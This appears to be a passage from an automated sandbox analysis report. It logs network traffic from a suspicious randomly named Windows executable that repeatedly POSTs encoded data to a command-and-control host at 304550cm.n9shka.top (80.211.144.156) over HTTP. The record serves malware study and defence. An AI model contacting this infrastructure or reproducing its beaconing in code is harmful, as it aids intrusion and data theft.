                                                          Sep 8, 2024 11:55:29.452666998 CEST806494480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:29.452773094 CEST806494480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:29.759602070 CEST806494480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:29.806513071 CEST6494480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:29.892791986 CEST806494480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:29.896753073 CEST6494480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:29.902399063 CEST806494480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:29.904539108 CEST6494480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:30.007714033 CEST6494580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:30.013010979 CEST806494580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:30.013653994 CEST6494580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:30.013653994 CEST6494580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:30.018630981 CEST806494580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:30.370440006 CEST6494580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:30.375500917 CEST806494580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:30.375509977 CEST806494580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:30.375515938 CEST806494580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:30.686160088 CEST806494580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:30.728319883 CEST6494580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:30.891495943 CEST806494580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:30.947077036 CEST6494580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:31.022233963 CEST6494580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:31.023231030 CEST6494680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:31.028537035 CEST806494580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:31.028578043 CEST6494580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:31.028620958 CEST806494680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:31.028670073 CEST6494680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:31.028884888 CEST6494680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:31.033628941 CEST806494680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:31.384679079 CEST6494680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:31.389590025 CEST806494680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:31.389600992 CEST806494680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:31.389612913 CEST806494680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:31.721021891 CEST806494680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:31.775399923 CEST6494680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:31.852442026 CEST806494680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:31.900222063 CEST6494680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:31.975688934 CEST6494780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:31.975688934 CEST6494680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:31.981153965 CEST806494780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:31.981270075 CEST6494780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:31.981436968 CEST6494780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:31.981707096 CEST806494680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:31.981849909 CEST6494680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:31.987104893 CEST806494780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:32.337930918 CEST6494780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:32.343086958 CEST806494780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:32.343094110 CEST806494780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:32.343103886 CEST806494780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:32.656706095 CEST806494780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:32.697088003 CEST6494780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:32.859069109 CEST806494780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:32.900227070 CEST6494780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:32.978933096 CEST6494780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:32.979752064 CEST6494880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:32.984105110 CEST806494780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:32.984164000 CEST6494780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:32.984564066 CEST806494880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:32.984620094 CEST6494880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:32.984730959 CEST6494880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:32.989451885 CEST806494880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:33.337841034 CEST6494880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:33.343017101 CEST806494880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:33.343030930 CEST806494880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:33.343039036 CEST806494880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:33.662143946 CEST806494880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:33.714397907 CEST6494880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:33.776556015 CEST6494880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:33.776556969 CEST6494980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:33.781552076 CEST806494980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:33.781816006 CEST806494880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:33.786533117 CEST6494980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:33.786534071 CEST6494880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:33.786689043 CEST6494980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:33.791510105 CEST806494980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:33.897892952 CEST6495080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:33.902832031 CEST806495080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:33.906512976 CEST6495080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:33.906780005 CEST6495080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:33.911587954 CEST806495080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:34.134708881 CEST6494980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:34.143480062 CEST806494980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:34.143898964 CEST806494980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:34.259799004 CEST6495080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:34.265597105 CEST806495080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:34.265609980 CEST806495080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:34.265620947 CEST806495080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:34.455622911 CEST806494980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:34.503572941 CEST6494980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:34.589651108 CEST806494980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:34.594784975 CEST806495080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:34.634603977 CEST6494980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:34.634648085 CEST6495080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:34.728415966 CEST806495080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:34.775222063 CEST6495080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:34.854686022 CEST6494980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:34.854887962 CEST6495080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:34.855882883 CEST6495180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:34.860307932 CEST806494980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:34.860358953 CEST6494980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:34.860522032 CEST806495080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:34.860558033 CEST6495080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:34.860688925 CEST806495180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:34.860744953 CEST6495180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:34.860896111 CEST6495180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:34.865874052 CEST806495180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:35.212979078 CEST6495180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:35.217946053 CEST806495180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:35.217959881 CEST806495180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:35.217972040 CEST806495180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:35.522583961 CEST806495180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:35.574433088 CEST6495180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:35.739804029 CEST806495180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:35.790925026 CEST6495180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:35.870430946 CEST6495280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:35.870430946 CEST6495180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:35.875459909 CEST806495280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:35.875735044 CEST6495280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:35.875735044 CEST6495280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:35.875828981 CEST806495180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:35.876024961 CEST6495180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:35.880718946 CEST806495280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:36.228729963 CEST6495280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:36.234178066 CEST806495280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:36.234186888 CEST806495280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:36.234193087 CEST806495280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:36.539917946 CEST806495280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:36.587747097 CEST6495280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:36.672641039 CEST806495280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:55:36.712734938 CEST6495280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:36.795047045 CEST6495280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:55:36.795938015 CEST6495380192.168.2.480.211.144.156
                                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                          Sep 8, 2024 11:52:07.435322046 CEST | 54405 | 53 | 192.168.2.4 | 1.1.1.1
                                                          Sep 8, 2024 11:52:08.123707056 CEST | 53 | 54405 | 1.1.1.1 | 192.168.2.4
                                                          Sep 8, 2024 11:52:26.422591925 CEST | 53 | 51966 | 162.159.36.2 | 192.168.2.4
                                                          Sep 8, 2024 11:52:26.944845915 CEST | 53 | 49435 | 1.1.1.1 | 192.168.2.4
                                                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                          Sep 8, 2024 11:52:07.435322046 CEST | 192.168.2.4 | 1.1.1.1 | 0x654f | Standard query (0) | 304550cm.n9shka.top | A (IP address) | IN (0x0001) | false
                                                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                          Sep 8, 2024 11:52:08.123707056 CEST | 1.1.1.1 | 192.168.2.4 | 0x654f | No error (0) | 304550cm.n9shka.top |  | 80.211.144.156 | A (IP address) | IN (0x0001) | false
                                                          • 304550cm.n9shka.top
                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          0 | 192.168.2.4 | 49738 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:52:08.136590004 CEST | 318 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 344
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:08.799870014 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:08.949632883 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:08 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 1320
                                                          Connection: keep-alive
                                                          Sep 8, 2024 11:52:09.058798075 CEST | 294 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 380
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:52:09.262919903 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:09.559273005 CEST | 308 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:08 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Sep 8, 2024 11:52:09.581399918 CEST | 295 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 1412
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:52:09.785677910 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:10.092758894 CEST | 308 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:09 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          1 | 192.168.2.4 | 49739 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:52:09.173141956 CEST | 295 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:52:09.851191998 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:09.981803894 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:09 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          2 | 192.168.2.4 | 49741 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:52:10.117616892 CEST | 295 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:52:10.782573938 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:11.176301956 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:10 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          3 | 192.168.2.4 | 49742 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:52:11.310686111 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:11.984271049 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:12.181865931 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:11 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          4 | 192.168.2.4 | 49744 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:52:12.308795929 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:12.973934889 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:13.104924917 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:12 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          5 | 192.168.2.4 | 49746 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:52:13.237826109 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:13.903029919 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:14.032896996 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:13 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          6 | 192.168.2.4 | 49747 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:52:14.156831026 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:14.823719978 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:15.028212070 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:14 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          7 | 192.168.2.4 | 49748 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:52:15.109888077 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 1400
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          8 | 192.168.2.4 | 49749 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:52:15.431118011 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:16.123929977 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:16.259923935 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:15 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          9 | 192.168.2.4 | 49750 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:52:16.388066053 CEST | 295 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:52:16.743978024 CEST2532OUTData Raw: 5b 59 59 51 5a 5d 5b 5b 5c 5a 51 56 57 5a 57 50 50 5f 5e 50 54 5d 53 40 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [YYQZ][[\ZQVWZWPP_^PT]S@TRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%,2>:;408X*(3?,7<'X"=5+,'7[-;#G X/%
                                                          Sep 8, 2024 11:52:17.058253050 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:17.189481974 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:16 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49751 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 11:52:17.310313940 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 304550cm.n9shka.top
Content-Length: 2532
Expect: 100-continue
Connection: Keep-Alive
Sep 8, 2024 11:52:17.665839911 CEST | 2532 | OUT | Data Raw: [binary payload]
Sep 8, 2024 11:52:17.976203918 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 8, 2024 11:52:18.176503897 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 08 Sep 2024 09:52:17 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3f 59 5f 5a
Data Ascii: ?Y_Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49752 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 11:52:18.317027092 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 304550cm.n9shka.top
Content-Length: 2532
Expect: 100-continue
Connection: Keep-Alive
Sep 8, 2024 11:52:18.665863991 CEST | 2532 | OUT | Data Raw: [binary payload]
Sep 8, 2024 11:52:18.987389088 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 8, 2024 11:52:19.116755962 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 08 Sep 2024 09:52:18 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3f 59 5f 5a
Data Ascii: ?Y_Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49753 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 11:52:19.246618986 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 304550cm.n9shka.top
Content-Length: 2532
Expect: 100-continue
Connection: Keep-Alive
Sep 8, 2024 11:52:19.603374958 CEST | 2532 | OUT | Data Raw: [binary payload]
